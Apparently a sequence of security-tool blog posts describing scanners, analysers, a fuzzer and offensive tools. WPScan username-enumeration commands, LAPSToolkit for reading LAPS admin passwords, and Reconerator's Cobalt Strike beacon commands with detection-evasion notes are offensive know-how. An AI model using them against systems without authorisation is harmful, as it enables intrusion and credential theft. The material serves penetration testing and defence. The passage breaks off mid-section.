Androwarn - Yet Another Static Code Analyzer For Malicious Android Applications

March 24, 2019, 1:32 pm

≫ Next: WPScan v3.4.5 - Black Box WordPress Vulnerability Scanner

≪ Previous: FIR - Fast Incident Response

Androwarn is a tool whose main aim is to detect and warn the user about potential malicious behaviours developped by an Android application.

The detection is performed with the static analysis of the application's Dalvik bytecode, represented as Smali, with the androguard library.

This analysis leads to the generation of a report, according to a technical detail level chosen from the user.

Features

Structural and data flow analysis of the bytecode targeting different malicious behaviours categories
- Telephony identifiers exfiltration: IMEI, IMSI, MCC, MNC, LAC, CID, operator's name...
- Device settings exfiltration: software version, usage statistics, system settings, logs...
- Geolocation information leakage: GPS/WiFi geolocation...
- Connection interfaces information exfiltration: WiFi credentials, Bluetooth MAC adress...
- Telephony services abuse: premium SMS sending, phone call composition...
- Audio/video flow interception: call recording, video capture...
- Remote connection establishment: socket open call, Bluetooth pairing, APN settings edit...
- PIM data leakage: contacts, calendar, SMS, mails, clipboard...
- External memory operations: file access on SD card...
- PIM data modification: add/delete contacts, calendar events...
- Arbitrary code execution: native code using JNI, UNIX command, privilege escalation...
- Denial of Service: event notification deactivation, file deletion, process killing, virtual keyboard disable, terminal shutdown/reboot...
Report generation according to several detail levels
- Essential (-v 1) for newbies
- Advanced (-v 2)
- Expert (-v 3)
Report generation according to several formats
- Plaintext txt
- Formatted html from a Bootstrap template
- JSON

Usage

Options

usage: androwarn [-h] -i INPUT [-o OUTPUT] [-v {1,2,3}] [-r {txt,html,json}]
                 [-d]
                 [-L {debug,info,warn,error,critical,DEBUG,INFO,WARN,ERROR,CRITICAL}]
                 [-w]

version: 1.4

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        APK file to analyze
  -o OUTPUT, --output OUTPUT
                        Output report file (default
                        "./<apk_package_name>_<timestamp>.<report_type>")
  -v {1,2,3}, --verbose {1,2,3}
                        Verbosity level (ESSENTIAL 1, ADVANCED 2, EXPERT 3)
                        (default 1)
  -r {txt,html,json}, --report {txt,html,json}
                        Report type (default "html")
  -d, --display-report  Display analysis results to stdout
  -L {debug,info,warn,error,critical,DEBUG,INFO,WARN,ERROR,CRITICAL}, --log-level {debug,info,warn,error,critical,DEBUG,INFO,WARN,ERROR,CRITICAL}
                        Log level (default "ERROR")
  -w, --with-playstore-lookup
                        Enable online lookups on Google Play

Common usage

$ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3

By default, the report is generated in the current folder.
An HTML report is now contained in a standalone file, CSS/JS resources are inlined.

Sample application
A sample application has been built, concentrating several malicious behaviours.
The APK is available in the _SampleApplication/bin/ folder and the HTML report is available in the _SampleReports folder.

Dependencies and installation

Python 2.7 + androguard + jinja2 + play_scraper + argparse
The easiest way to setup everything: pip install androwarn and then directly use $ androwarn
Or git clone that repository and pip install -r requirements.txt

Changelog

version 1.5 - 2019/01/05: few fixes
version 1.4 - 2019/01/04: code cleanup and use of the latest androguard version
version 1.3 - 2018/12/30: few fixes
version 1.2 - 2018/12/30: few fixes
version 1.1 - 2018/12/29: fixing few bugs, removing Chilkat dependencies and pip packaging
version 1.0 - from 2012 to 2013

Contributing
You're welcome, any help is appreciated :)

Contact

Thomas Debize < tdebize at mail d0t com >
Join #androwarn on Freenode

Greetings

Stéphane Coulondre, for supervising my Final Year project
Anthony Desnos, for his amazing Androguard project and his help through my Final Year project

Download Androwarn

↧

WPScan v3.4.5 - Black Box WordPress Vulnerability Scanner

March 25, 2019, 5:09 am

≫ Next: Got-Responded - A Simple Tool To Detect NBT-NS And LLMNR Spoofing

≪ Previous: Androwarn - Yet Another Static Code Analyzer For Malicious Android Applications

WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.

INSTALL

Prerequisites

(Optional but highly recommended: RVM)
Ruby >= 2.3 - Recommended: latest
- Ruby 2.5.0 to 2.5.3 can cause an 'undefined symbol: rmpd_util_str_to_d' error in some systems, see #1283
Curl >= 7.21 - Recommended: latest
- The 7.29 has a segfault
RubyGems - Recommended: latest

From RubyGems (Recommended)

gem install wpscan

On MacOSX, if a Gem::FilePermissionError is raised due to the Apple's System Integrity Protection (SIP), either install RVM and install wpscan again, or run sudo gem install -n /usr/local/bin wpscan (see #1286)

From sources (NOT Recommended)
Prerequisites: Git

git clone https://github.com/wpscanteam/wpscan
cd wpscan/
bundle install && rake install

Updating
You can update the local database by using wpscan --update
Updating WPScan itself is either done via gem update wpscan or the packages manager (this is quite important for distributions such as in Kali Linux: apt-get update && apt-get upgrade) depending how WPScan was (pre)installed

Docker
Pull the repo with docker pull wpscanteam/wpscan
Enumerating usernames

docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u

Enumerating a range of usernames

docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u1-100

** replace u1-100 with a range of your choice.

Usage
wpscan --url blog.tld This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then wpscan --stealthy --url blog.tld can be used. As a result, when using the --enumerate option, don't forget to set the --plugins-detection accordingly, as its default is 'passive'.
For more options, open a terminal and type wpscan --help (if you built wpscan from the source, you should type the command outside of the git repo)
The DB is located at ~/.wpscan/db
WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last):

~/.wpscan/cli_options.json
~/.wpscan/cli_options.yml
pwd/.wpscan/cli_options.json
pwd/.wpscan/cli_options.yml

If those files exist, options from them will be loaded and overridden if found twice.
e.g:
~/.wpscan/cli_options.yml:

proxy: 'http://127.0.0.1:8080'
verbose: true

pwd/.wpscan/cli_options.yml:

proxy: 'socks5://127.0.0.1:9090'
url: 'http://target.tld'

Running wpscan in the current directory (pwd), is the same as wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld
Enumerating usernames

wpscan --url https://target.tld/ --enumerate u

Enumerating a range of usernames

wpscan --url https://target.tld/ --enumerate u1-100

** replace u1-100 with a range of your choice.

LICENSE

WPScan Public Source License
The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2019 WPScan Team.
Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.

1. Definitions
1.1 "License" means this document.
1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.
1.3 "WPScan Team" means WPScan’s core developers.

2. Commercialization
A commercial use is one intended for commercial advantage or monetary compensation.
Example cases of commercialization are:

Using WPScan to provide commercial managed/Software-as-a-Service services.
Distributing WPScan as a commercial product or as part of one.
Using WPScan as a value added service/product.

Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to):

Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit.
Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux.
Using WPScan to test your own systems.
Any non-commercial use of WPScan.

If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - team@wpscan.org.
Free-use Terms and Conditions;

3. Redistribution
Redistribution is permitted under the following conditions:

Unmodified License is provided with WPScan.
Unmodified Copyright notices are provided with WPScan.
Does not conflict with the commercialization clause.

4. Copying
Copying is permitted so long as it does not conflict with the Redistribution clause.

5. Modification
Modification is permitted so long as it does not conflict with the Redistribution clause.

6. Contributions
Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content.

7. Support
WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team.

8. Disclaimer of Warranty
WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing.

9. Limitation of Liability
To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services.

10. Disclaimer
Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan.

11. Trademark
The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.

Download Wpscan

↧

Got-Responded - A Simple Tool To Detect NBT-NS And LLMNR Spoofing

March 25, 2019, 1:23 pm

≫ Next: H2T - Scans A Website And Suggests Security Headers To Apply

≪ Previous: WPScan v3.4.5 - Black Box WordPress Vulnerability Scanner

Pentesters, Redteamers and even real attackers love to use tools like Responder to spoof LLMNR and/or NBT-NS responses. There are some awesome other tools to help with detection, such as respounder. But I wanted to figure it out for my self, and at the same time add a way to push "honey" tokens (fake AD credentials) to people using these spoofing tools.

How to install

git clone https://github.com/joda32/got-responded.git
cd got-responded
python3 -m venv responded-env
source responded-env/bin/activate
pip install -r requirements.txt

How to use it

Simple mode
This will start it in default mode, will check for both LLMNR and NBT-NS spoofing, but will not send fake SMB creds

python got-responded.py

Download Got-Responded

↧

H2T - Scans A Website And Suggests Security Headers To Apply

March 26, 2019, 5:11 am

≫ Next: Xori - An Automation-Ready Disassembly And Static Analysis Library For PE32, 32+ And Shellcode

≪ Previous: Got-Responded - A Simple Tool To Detect NBT-NS And LLMNR Spoofing

h2t is a simple tool to help sysadmins to hardening their websites.
Until now h2t checks the website headers and recommends how to make it better.

Dependences

Install

$ git clone https://github.com/gildasio/h2t
$ cd h2t
$ pip install -r requirements.txt
$ ./h2t.py -h

Usage
h2t has subcommands: list and scan.

$ ./h2t.py -h
usage: h2t.py [-h] {list,l,scan,s} ...

h2t - HTTP Hardening Tool

positional arguments:
  {list,l,scan,s}  sub-command help
    list (l)       show a list of available headers in h2t catalog (that can
                   be used in scan subcommand -H option)
    scan (s)       scan url to hardening headers

optional arguments:
  -h, --help       show this help message and exit

List Subcommand
The list subcommand lists all headers cataloged in h2t and can show informations about it as a description, links for more information and for how to's.

$ ./h2t.py list -h
usage: h2t.py list [-h] [-p PRINT [PRINT ...]] [-B]
                   [-a | -H HEADERS [HEADERS ...]]

optional arguments:
  -h, --help            show this help message and exit
  -p PRINT [PRINT ...], --print PRINT [PRINT ...]
                        a list of additional information about the headers to
                        print. For now there are two options: description and
                        refs (you can use either or both)
  -B, --no-banner       don't print the h2t banner
  -a, --all             list all available headers [default]
  -H HEADERS [HEADERS ...], --headers HEADERS [HEADERS ...]
                        a list of headers to look for in the h2t catalog

Scan Subcommand
The scan subcommand perform a scan in a website looking for their headers.

$ ./h2t.py scan -h
usage: h2t.py scan [-h] [-v] [-a] [-g] [-b] [-H HEADERS [HEADERS ...]]
                   [-p PRINT [PRINT ...]]
                   [-i IGNORE_HEADERS [IGNORE_HEADERS ...]] [-B] [-E] [-n]
                   [-u USER_AGENT] [-r | -s]
                   url

positional arguments:
  url                   url to look for

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         increase output verbosity: -v print response headers,
                        -vv print response and request headers
  -a, --all             scan all cataloged headers [default]
  -g, --good            scan good headers only
  -b, --bad             scan bad headers only
  -H HEADERS [HEADERS ...], --headers HEADERS [HEADERS ...]
                        scan only these headers (see available in list sub-
                        command)
  -p PRINT [PRINT ...], --print PRINT [PRINT ...]
                        a list of additional information about the headers to
                        print. For now there are two options: description and
                        refs (you can use either or both)
  -i IGNORE_HEADERS [IGNORE_HEADERS ...], --ignore-headers IGNORE_HEADERS [IGNORE_HEADERS ...]
                        a list of headers to ignore in the results
  -B, --no-banner       don't print the h2t banner
  -E, --no-explanation  don't print the h2t output explanation
  -o {normal,csv,json}, --output {normal,csv,json}
                        choose which output format to use (available: normal,
                        csv, json)
  -n, --no-redirect     don't follow http redirects
  -u USER_AGENT, --user-agent USER_AGENT
                        set user agent to scan request
  -k, --insecure        don't verify SSL certificate as valid
  -r, --recommendation  output only recommendations [default]
  -s, --status          output actual status (eg: existent headers only)

Output
For now the output is only in normal mode. Understant it as follows:

[+] Red Headers are bad headers that open a breach on your website or maybe show a lots of information. We recommend fix it.
[+] Yellow Headers are good headers that is not applied on your website. We recommend apply them.
[-] Green Headers are good headers that is already used in your website. It's shown when use -s flag.

Example:

Cookie HTTP Only would be good to be applied
Cookie over SSL/TLS would be good to be applied
Server header would be good to be removed
Referrer-Policy would be good to be applied
X-Frame-Options is already in use, nothing to do here
X-XSS-Protection is already in use, nothing to do here

Screenshots

List h2t catalog

Scan from file

Scan url

Scan verbose

Headers information

Download H2T

↧

Xori - An Automation-Ready Disassembly And Static Analysis Library For PE32, 32+ And Shellcode

March 26, 2019, 1:23 pm

≫ Next: LAPSToolkit - Tool To Audit And Attack LAPS Environments

≪ Previous: H2T - Scans A Website And Suggests Security Headers To Apply

Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data.

Acknowledgements:
Xori wouldn't exist without inspiration and ideas from the open source community. We are indebted to the work of the Capstone engine and the LLVM Project.

Architectures:

i386
x86-64

File Formats

PE, PE+
Plain shellcode

Current Features

Outputs json of the 1) Disassembly, 2) Functions, and 3) Imports.
Manages Image and Stack memory.
2 modes:
- Light Emulation - meant to enumerate all paths (Registers, Stack, Some Instructions).
- Full Emulation - only follows the code’s path (Slow performance).
Simulated TEB & PEB structures.
Evaluates functions based on DLL exports.
Displays strings based on referenced memory locations.
Uses FLIRT style signatures (Fast Library Identification and Recognition Technology).
Allows you to use your own exports for simulating the PEB.
Will detect padding after a non-returning call.
Will try to identify function references from offsets.

What it doesn't do yet:

The engine is interactive.
Does not dump strings.
Does not process non-executable sections.
TEB and PEB are not enabled for non-pe files.
Only some x86 instructions are emulated, not all.
Patching and assembling.
No plugins or scripting.

Documentation

Requirements
rustc 1.27.0

Install rust for OSX & Linux Distros

curl https://sh.rustup.rs -sSf | sh

Install rust for Windows
First get the rustup.exe (the rust toolchain installer) from here.

This tool will install the rust compilerrustc, the rust package manager cargo and other usefull tools for development in rust.

run the rustup.exe

Install rust prerequisites
in case you see this output, your Windows environment is missing the Build Tools for Visual Studio so keep reading, otherwise go here

follow the link from the output, or click here
cancel the rustup-init.exe
back in browser, scroll down, expand the tab Tools for Visual Studio 2017& download the Build Tools for Visual Studio 2017

run the executable

choose the Visual C++ build tools& click "install", close the "Visual Studio Installer" after the installation

Install rust toolchain
run the rustup.exe& you will see the following output

after the successful installation you can see that the rust compiler rustc, rust package manager cargo and other tools were installed (under C:\Users\%username%\.cargo& C:\Users\%username%\.rustup)

open a new "Command Prompt" & follow the xori build steps here

Installation

1. Build Xori
This command will also create other binaries such as pesymbols ans peinfo.

git clone https://github.com/endgameinc/xori.git
cd xori
cargo build --release

2. Create xori.json config file

cp xori.json.example xori.json
[edit if desired]

3. (Optional) Build the symbols files
If you want to create your own symbol files you need to set the dll folders to where you stored your windows dlls.

"function_symbol32": "./src/analysis/symbols/generated_user_syswow64.json",
"function_symbol64": "./src/analysis/symbols/generated_user_system32.json",
"symbol_server": {
 "dll_folder32": "./dlls/32bit",
 "dll_folder64": "./dlls/64bit"

Run pesymbols to overwrite the function_symbol json

 ./target/release/pesymbols

Run

./target/release/xori -f test.exe

Run all tests

cargo test

Browser GUI

Chrome	Firefox	Safari	IE	Opera
Latest ✔	Latest ✔	Latest ✔	x	Latest ✔

Requirements
nodejs
yarn (optional for UI dev)

On Ubuntu 18.04 you may need to apt install the following: curl git libssl-dev pkg-config build-essential npm

Build

cd gui
npm install

Run
In one terminal

cd gui
node src/server.js

In another terminal

cd gui
npm start

It will open your default browser to http://localhost:3000/. The backend API is listening on localhost:5000.

Download Xori

↧

LAPSToolkit - Tool To Audit And Attack LAPS Environments

March 27, 2019, 5:05 am

≫ Next: Flightsim - A Utility To Generate Malicious Network Traffic And Evaluate Controls

≪ Previous: Xori - An Automation-Ready Disassembly And Static Analysis Library For PE32, 32+ And Shellcode

Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins, finding users with "All Extended Rights" that can view passwords, and viewing all computers with LAPS enabled.

Please submit issues or comments for any problems or performance improvements. This project was created with code from an older version of PowerView.

For more information on how LAPS works see https://adsecurity.org/?p=1790.

Get-LAPSComputers:
Displays all computers with LAPS enabled, password expriation, and password if user has access

Find-LAPSDelegatedGroups:
Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute

Find-AdmPwdExtendedRights
Parses through ExtendedRights for each AD computer with LAPS enabled and looks for which group has read access and if any user has "All Extended Rights". Sysadmins may not be aware the users with All Extended Rights can view passwords and may be less protected than the users in the delegated groups. An example is the user which adds a computer to the domain automatically receives the "All Extended Rights" permission. Since this function will parse ACLs for each AD computer, this can take very long with a larger domain.

Special thanks to Sean Metcalf (@pyrotek3), Will Schroeder (@harmj0y), Karl Fosaaen (@kfosaaen), Matt Graeber (@mattifestation) for research and code with LAPS, AD permissions, and offensive PowerShell.

Download LAPSToolkit

↧

Flightsim - A Utility To Generate Malicious Network Traffic And Evaluate Controls

March 27, 2019, 1:53 pm

≫ Next: Mutiny Fuzzing Framework - Network Fuzzer That Operates By Replaying PCAPs Through A Mutational Fuzzer

≪ Previous: LAPSToolkit - Tool To Audit And Attack LAPS Environments

flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility. The tool performs tests to simulate DNS tunneling, DGA traffic, requests to known active C2 destinations, and other suspicious traffic patterns.

Installation
Download the latest flightsim binary for your OS from the GitHub Releases page. Alternatively, the utility can be built using Golang in any environment (e.g. Linux, MacOS, Windows), as follows:

go get -u github.com/alphasoc/flightsim/...

Running Network Flight Simulator
Upon installation, test flightsim as follows:

$ flightsim --help

AlphaSOC Network Flight Simulator™ (https://github.com/alphasoc/flightsim)

flightsim is an application which generates malicious network traffic for security
teams to evaluate security controls (e.g. firewalls) and ensure that monitoring tools
are able to detect malicious traffic.

Usage:
  flightsim [command]

Available Commands:
  help        Help about any command
  run         Run all simulators (default) or a particular test
  version     Print version and exit

Flags:
  -h, --help   help for flightsim

Use "flightsim [command] --help" for more information about a command

The utility runs individual modules to generate malicious traffic. To perform all available tests, simply use flightsim run which will generate traffic using the first available non-loopback network interface. NB: when running the C2 modules, flightsim will gather current C2 addresses from the Cybercrime Tracker and AlphaSOC API, so requires egress Internet access.
To list the available modules, use flightsim run --help. To execute a particular test, use flightsim run <module>, as below.

$ flightsim run --help
Run all simulators (default) or a particular test

Usage:
  flightsim run [c2-dns|c2-ip|dga|hijack|scan|sink|spambot|tunnel] [flags]

Flags:
  -n,                      number of hosts generated for each simulator (default 10)
      --fast               run simulator fast without sleep intervals
  -h, --help               help for run
  -i, --interface string   network interface to use

$ flightsim run dga

AlphaSOC Network Flight Simulator™ (https://github.com/alphasoc/flightsim)
The IP address of the network interface is 172.31.84.103
The current time is 10-Jan-18 09:30:28

Time      Module   Description
--------------------------------------------------------------------------------
09:30:28  dga      Starting
09:30:28  dga      Generating list of DGA domains
09:30:30  dga      Resolving rdumomx.xyz
09:30:31  dga      Resolving rdumomx.biz
09:30:31  dga      Resolving rdumomx.top
09:30:32  dga      Resolving qtovmrn.xyz
09:30:32  dga      Resolving qtovmrn.biz
09:30:33  dga      Resolving qtovmrn.top
09:30:33  dga      Resolving pbuzkkk.xyz
09:30:34  dga      Resolving pbuzkkk.biz
09:30:34  dga      Resolving pbuzkkk.top
09:30:35  dga      Resolving wfoheoz.xyz
09:30:35  dga      Resolving wfoheoz.biz
09:30:36  dga      Resolving wfoheoz.top
09:30:36  dga      Resolving lhecftf.xyz
09:30:37  dga      Resolving lhecftf.biz
09:30:37  dga      Resolving lhecftf.top
09:30:38  dga      Finished

All done! Check your SIEM for alerts using the timestamps and details above.

Description of Modules
The modules packaged with the utility are listed in the table below.

Module	Description
`c2-dns`	Generates a list of current C2 destinations and performs DNS requests to each
`c2-ip`	Connects to 10 random current C2 IP:port pairs to simulate egress sessions
`dga`	Simulates DGA traffic using random labels and top-level domains
`hijack`	Tests for DNS hijacking support via ns1.sandbox.alphasoc.xyz
`scan`	Performs a port scan of 10 random RFC 1918 addresses using common ports
`sink`	Connects to 10 random sinkholed destinations run by security providers
`spambot`	Resolves and connects to random Internet SMTP servers to simulate a spam bot
`tunnel`	Generates DNS tunneling requests to *.sandbox.alphasoc.xyz

Download Flightsim

↧

Mutiny Fuzzing Framework - Network Fuzzer That Operates By Replaying PCAPs Through A Mutational Fuzzer

March 28, 2019, 5:14 am

≫ Next: Reconerator - C# Targeted Attack Reconnaissance Tools

≪ Previous: Flightsim - A Utility To Generate Malicious Network Traffic And Evaluate Controls

The Mutiny Fuzzing Framework is a network fuzzer that operates by replaying PCAPs through a mutational fuzzer. The goal is to begin network fuzzing as quickly as possible, at the expense of being thorough.

The general workflow for Mutiny is to take a sample of legitimate traffic, such as a browser request, and feed it into a prep script to generate a .fuzzer file. Then, Mutiny can be run with this .fuzzer file to generate traffic against a target host, mutating whichever packets the user would like.

There are extensions that allow changing how Mutiny behaves, including changing messages based on input/output, changing how Mutiny responds to network errors, and monitoring the target in a separate thread.

Mutiny uses Radamsa to perform mutations.

The Decept Proxy is a multi-purpose network proxy that can forward traffic from a plaintext or TLS TCP/UDP/domain socket connection to a plaintext or TLS TCP/UDP/domain socket connection, among other features. It makes a good companion for Mutiny, as it can both generate .fuzzer files directly, particularly helpful when fuzzing TLS connections, and allow Mutiny to communicate with TLS hosts.

sample_apps give a basic idea of some things that can be done with the fuzzer, with a few different applications/clients to test with.

Written by James Spadaro (jaspadar@cisco.com) and Lilith Wyatt (liwyatt@cisco.com)

Setup
Ensure python and scapy are installed.
Untar Radamsa and make (You do not have to make install, unless you want it in /usr/bin - it will use the local Radamsa) Update mutiny.py with path to Radamsa if you changed it.

Basic Usage
Save pcap into a folder. Run mutiny_prep.py on <XYZ>.pcap (also optionally pass the directory of a custom processor if any, more below). Answer the questions, end up with a <XYZ>.fuzzer file in same folder as pcap.
Run mutiny.py <XYZ>.fuzzer <targetIP> This will start fuzzing. Logs will be saved in same folder, under directory <XYZ>_logs/<time_of_session>/<seed_number>

More Detailed Usage

.fuzzer Files
The .fuzzer files are human-readable and commented. They allow changing various options on a per-fuzzer-file basis, including which message or message parts are fuzzed.

Message Formatting
Within a .fuzzer file is the message contents. These are simply lines that begin with either 'inbound' or 'outbound', signifying which direction the message goes. They are in Python string format, with '\xYY' being used for non-printable characters. These are autogenerated by 'mutiny_prep.py' and Decept, but sometimes need to be manually modified.

Message Formatting - Manual Editing
If a message has the 'fuzz' keyword after 'outbound', this indicates it is to be fuzzed through Radamsa. A given message can have line continuations, by simply putting more message data in quotes on a new line. In this case, this second line will be merged with the first.
Alternatively, the 'sub' keyword can be used to indicate a subcomponent. This allows specifying a separate component of the message, in order to fuzz only certain parts and for convenience within a Message Processor.
Here is an example arbitrary set of message data:

outbound 'say'
    ' hi'
sub fuzz ' and fuzz'
    ' this'
sub ' but not this\xde\xad\xbe\xef'
inbound 'this is the server's'
    ' expected response'

This will cause Mutiny to transmit say hi and fuzz this but not this(0xdeadbeef). 0xdeadbeef will be transmitted as 4 hex bytes. and fuzz this will be passed through Radamsa for fuzzing, but say hi and but not this(0xdeadbeef) will be left alone.
Mutiny will wait for a response from the server after transmitting the single above message, due to the 'inbound' line. The server's expected response is this is the server's expected response. Mutiny won't do a whole lot with this data, aside from seeing if what the server actually sent matches this string. If a crash occurs, Mutiny will log both the expected output from the server and what the server actually replied with.

Customization
mutiny_classes/ contains base classes for the Message Processor, Monitor, and Exception Processor. Any of these files can be copied into the same folder as the .fuzzer (by default) or into a separate subfolder specified as the 'processor_dir' within the .fuzzer file.
These three classes allow for storing server responses and changing outgoing messages, monitoring the target on a separate thread, and changing how Mutiny handles exceptions.

Customization - Message Processor
The Message Processor defines various callbacks that are called during a fuzzing run. Within these callbacks, any Python code can be run. Anecdotally, these are primarily used in three ways.
The most common is when the server sends tokens that need to be added to future outbound messages. For example, if Mutiny's first message logs in, and the server responds with a session ID, the postReceiveProcess() callback can be used to store that session ID. Then, in preSendProcess(), the outgoing data can be fixed up with that session ID. An example of this is in sample_apps/session_server.
Another common use of a Message Processor is to limit or change a fuzzed message. For example, if the server always drops messages greater than 1000 bytes, it may not be worth sending any large messages. preSendProcess() can be used to shorten messages after fuzzing but before they are sent or to raise an exception.
Raising an exception brings up the final way Message Processors are commonly used. Within a callback, any custom exceptions defined in mutiny_classes/mutiny_exceptions.py can be raised. There are several exceptions, all commented, that will cause various behaviors from Mutiny. These generally involve either logging, retrying, or aborting the current run.

Customization - Monitor
The Monitor has a monitorTarget() function that is run on a separate thread from the main Mutiny fuzzer. The purpose is to allow implementing a long-running process that can monitor a host in some fashion. This can be anything that can be done in Python, such as communicating with a monitor daemon running on the target, reading a long file, or even just pinging the host repeatedly, depending on the requirements of the fuzzing session.
If the Monitor detects a crash, it can call signalMain() at any time. This will signal the main Mutiny thread that a crash has occurred, and it will log the crash. This function should generally operate in an infinite loop, as returning will cause the thread to terminate, and it will not be restarted.

Customization - Exception Processor
The Exception Processor determines what Mutiny should do with a given exception during a fuzz session. In the most general sense, the processException() function will translate Python and OS-level exceptions into Mutiny error handling actions as best as it can.
For example, if Mutiny gets 'Connection Refused', the default response is to assume that the target server has died unrecoverably, so Mutiny will log the previous run and halt. This is true in most cases, but this behavior can be changed to that of any of the exceptions in mutiny_classes/mutiny_exceptions.py as needed, allowing tailoring of crash detection and error correction.

Quickstart: Mutiny tutorial
Blog post here:

http://blog.talosintelligence.com/2018/01/tutorial-mutiny-fuzzing-framework-and.html

Links to this YouTube video demo:

Download Mutiny-Fuzzer

↧

Reconerator - C# Targeted Attack Reconnaissance Tools

March 28, 2019, 1:40 pm

≫ Next: WinPwn - Automation For Internal Windows Penetrationtest

≪ Previous: Mutiny Fuzzing Framework - Network Fuzzer That Operates By Replaying PCAPs Through A Mutational Fuzzer

This is a custom .NET assembly which will perform a number of situational awareness activities. There are a number of current featuresets:

BASIC - Obtains information from the disk and registry.
LDAP - Allows customised AD LDAP queries to be made.
RESOLVEHOST - Performs DNS lookup queries.
INDEXSEARCH - Searches the Windows Indexing Service for local files and e-mails (filename and content).
PROXYCHECK - Displays the proxy server that will be used when attempting to access a provided URL.
PRIVESCCHECK - Identifies privilege escalation vectors.

The key point about this is that it is all implemented in raw .NET - so no powershell.
It is configured and controlled by command line parameters, making it suitable for use with Beacon's execute-assembly directive.

BASIC

Overview
This obtains a number of pieces of information from the host. Be warned that there might be a LOT of output. It will display:

All environment variables (API)
The hostname, workgroup and Windows version number of the host (API)
Word, Access, Excel, Publisher & Powerpoint Most Recently Used Documents for all versions installed (Registry)
Word, Access, Excel, Publisher & Powerpoint Trusted Locations for all versions installed (Registry)
Favourites (Bookmarks) and extracts the URL from the bookmark. Could be interesting to easily find sharepoint/confluence/wiki/self service payroll etc. (Disk)
Mapped drives, including the drive letter, description and remote location (WMI)
Installed applications, for all users and for the specific user only (Registry)

Parameters
The verb 'basic' needs to be passed on the command line, followed by the specific check that is required. If the word 'all' is passed as the second parameter, every check will be performed.

Check	Description
env	Displays all of the environment variables.
info	Displays the IP address of the host and the major/minor OS version identifier.
mru	Searches various "most recently used" lists. These currently comprise the Run box history and the Office file and path MRU for all versions of Word, Excel, Powerpoint, Access, Publisher and Visio. It also displays the location of the special "Recent" folder.
favourites	Displays the URLs stored in the favourites folder (which is basically the user's bookmarks). It currently does not support subfolders; I'll need to fix that.
mappeddrives	Displays the network mapped drives from the user's session. Useful for quickly finding central file shares and home directories. If it is mapped, it probably contains useful data.
installedapplications	Lists the applications that have been installed. This includes applications which have been installed as an admin (on the local machine) AND applications which have been installed by the current user. They are listed in different places in the registry.

Note that if 'all' is used, a 'proxycheck http://www.google.com' is automatically included. See the proxycheck section for details.

Examples
Perform all basic checks: beacon> execute-assembly /tmp/Reconerator.exe or beacon> execute-assembly /tmp/Reconerator.exe basic all
Perform mru enumeration only: beacon> execute-assembly /tmp/Reconerator.exe basic mru
List the mapped drives only: beacon> execute-assembly /tmp/Reconerator.exe basic mappeddrives

OpSec
Reasonably safe. This is querying the system registry; it is unlikely to be monitored.

Limitations (and further work)

You can't pick and choose what you want - its all or nothing.
Favourites do not recurse through directories
Missing a load of stuff.

LDAP
This allows you to perform an LDAP query. The easiest way of demonstrating this is by example.

Examples
This will show all users on the domain 'dc=stufus,dc=lan' with W2K8DC as a domain controller:
beacon> execute-assembly /tmp/Reconerator.exe ldap "LDAP://W2K8DC/dc=stufus,dc=lan" "objectClass=user" 0
This will show a maximum of 5 users on the domain 'dc=stufus,dc=lan' with W2K8DC as a domain controller:
beacon> execute-assembly /tmp/Reconerator.exe ldap "LDAP://W2K8DC/dc=stufus,dc=lan" "objectClass=user" 5
This will show all members of the domain admin group on the domain 'dc=stufus,dc=lan' with W2K8DC as a domain controller:

beacon> execute-assembly /tmp/Reconerator.exe ldap "LDAP://W2K8DC/dc=stufus,dc=lan" "(&(objectClass=group)(cn=Domain Admins))" 0

This will show all members of the domain admin or enterprise admin groups on the domain 'dc=stufus,dc=lan' with W2012DC as a domain controller:

beacon> execute-assembly /tmp/Reconerator.exe ldap "LDAP://W2012DC/dc=stufus,dc=lan" "(&(objectClass=group)(|(cn=Enterprise Admins)(cn=Domain Admins)))" 0

OpSec
This will generate network traffic to the domain controller that you specify. For the avoidance of doubt, it uses LDAP (as opposed to RPC or similar), and ATA does not seem to pick it up at the moment (as of 15/06/18).

Limitations (and further work)

Its a little untidy
It won't display anything that isn't a .NET string (needs more parsing)
Can't specify specific fields/attributes to show
You need to work out the DC yourself (you can get that from the LOGONSERVER environment variable) and work out the DN yourself. I'll get round to retrieving that automatically at some point.

RESOLVEHOST

Overview
This performs a DNS query using the host's DNS server.

Example
Resolve www.google.com:
